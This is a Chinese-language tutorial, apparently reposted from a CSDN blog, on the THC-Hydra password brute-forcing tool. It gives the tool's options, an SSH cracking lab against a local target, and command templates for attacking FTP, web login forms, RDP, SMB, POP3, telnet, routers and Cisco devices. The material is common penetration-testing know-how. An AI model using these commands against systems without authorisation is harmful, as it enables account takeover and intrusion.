欢迎搜索公众号：白帽子左一

　　每天分享更多黑客技能，工具及体系化视频教程（免费领）

　　九头蛇hydra

　　hydra是著名组织thc的一款开源的暴力破解密码工具、功能非常强大

　　kali下是默认安装的、几乎支持所有协议的在线破解。

　　

　　密码能否破解，在于字典是否强大以及电脑的性能。

　　我们就介绍下，这个装备怎么用

　　

　　首先下载安装

　　下载地址：https://github.com/vanhauser-thc/thc-hydra

　　Hydra：Kali是安全从业人员常用的Linux系统，自带有大量安全工具集，Hydra自然也集成在里面，工具位置在密码攻击—在线攻击一栏。

　　Windows中Hydra安装：

　　Hydra官方不支持Windows版，需要在GitHub上下载，地址为：

　　https://github.com/maaaaz/thc-hydra-windows

　　下载之后解压缩即可。

　　使用方法语法：Hydra 参数 IP 服务

　　参数：

　　-l login 小写，指定用户名进行破解

　　-L file 大写，指定用户的用户名字典

　　-p pass 小写，用于指定密码破解，很少使用，一般采用密码字典。

　　-P file 大写，用于指定密码字典。

　　-e ns 额外的选项，n：空密码试探，s：使用指定账户和密码试探

　　-M file 指定目标ip列表文件，批量破解。

　　-o file 指定结果输出文件

　　-f 找到第一对登录名或者密码的时候中止破解。

　　-t tasks 同时运行的线程数，默认是16

　　-w time 设置最大超时时间，单位

　　-v / -V 显示详细过程

　　-R 恢复爆破（如果破解中断了，下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。）

　　-x 自定义密码。

　　service：指定服务名，支持的服务跟协议有：telnet，ftp，pop3等等。

　　注意点：1.自己创建字典,然后放在当前的目录下或者指定目录。

　　2.参数可以统一放在最后，格式比如hydra ip 服务 参数。

　　3.如果能确定用户名一项时候，比如web登录破解，直接用 -l就可以，然后剩余时间破解密码。

　　4.缺点，如果目标网站登录时候需要验证码就无法破解。

　　5.man hydra最万能。

　　6.或者hydra -U http-form等查看具体帮助。

　　案例分析暴破ssh登录密码

　　环境介绍

　　攻击机：kali

　　装有hydra工具

　　靶机：192.168.154.131

　　安装ssh服务，正常运行

　　为了测试方便，我们创建两个简单的字典文件，如下：

　　

　　开始爆破根据命令参数，组织参数格式如下：

　　root@kali:/mnt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh

　　破解成功

　　因为字典数量比较少，我们可以轻易的破解成功，但是实际情况下，我们可能需要很久。

　　测试登录

　　使用得到的用户名/密码登录服务器，登录成功

　　

　　各种协议破解汇总FTP协议破解

　　破解ftp：

　　hydra -L 用户名字典 -P 密码字典 -t 6 -e ns IP地址 -vhttp协议破解

　　get方式提交，破解web登录：

　　hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns IP地址 http-get /admin/

　　hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns -f IP地址 http-get /admin/index.php

　　post方式提交，破解web登录：

　　hydra -f -l 用户名 -P 密码字典 -V -s 9900 IP地址 http-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"

　　#/index.php …这个是登录的 url

　　#后门是POST的数据 其中的用户名密码使用 USER PASS 来代替

　　#然后是如果登录出错 会出现的字符 。。。然后开始破解https协议破解

　　破解https

　　hydra -m /index.php -l 用户名 -P 密码字典.txt IP地址 https路由器破解

　　hydra -l admin -x 6:10:1a.~!@#$%^&()-=-t 8 192.168.1.1 http-get /

　　-l admin 为尝试破解的用户名。

　　# -x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.'等等组成，长度为 6 – 10 位。-t 8 表示分 8 个并行任务进行爆破尝试。192.168.1.1 为 Router 地址。http-get 为破解方式（协议）http-proxy协议破解

　　破解http-proxy：

　　hydra -l admin -P 字典.txt http-proxy://IP地址smb破解

　　破解smb：

　　hydra -l 用户名字典 -P 密码字典 IP地址 smbWindows远程桌面

　　破解rdp(windows远程登录)：

　　hydra ip地址 rdp -l administrator -P 密码字典.txt -V邮箱pop3

　　破解邮箱pop3：

　　hydra -l 用户名 -P 密码字典.txt my.pop3.mail pop3telnet破解

　　hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V语音通讯工具teamspeak

　　hydra -l 用户名字典 -P 密码字典.txt -s 端口号 -vV ip teamspeakcisco

　　hydra -P 密码字典 IP地址 cisco

　　hydra -m cloud -P 密码字典 IP地址 cisco-enabl————————————————

　　原文链接：https://blog.csdn.net/weixin_42350212/article/details/116419960